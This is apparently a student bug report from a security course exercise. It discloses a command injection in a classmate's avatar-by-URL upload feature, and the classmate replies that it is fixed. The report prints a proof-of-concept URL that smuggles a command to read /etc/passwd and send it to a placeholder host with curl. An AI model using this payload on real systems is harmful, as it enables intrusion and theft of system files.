B10732002 之漏洞回報

[TaiYou-TW]

攻擊者學號：B10715036 @a24230928

被攻擊者學號與網址：B10732002 @isgordon458 https://hw0302.you-can-not-see-me.ninja

漏洞類型：Command Injection

漏洞描述 使用 URL 上傳大頭貼的部份實作有漏洞，可讓使用者執行任意指令，這邊以 cat /etc/passwd 將敏感資訊傳出來示範

PoC 將以下的 {myHost} 換成自己的 server hostname 即可將任意資訊傳出，也可執行其他任意指令

http://google.com$(curl${IFS}http://myHost${IFS}-d$(cat${IFS}/etc/passwd))

[isgordon458]

已修復 攻擊時間：5/1 16：55 攻擊成因：未跳脫 $ 字元，使 $() 中的指令可被執行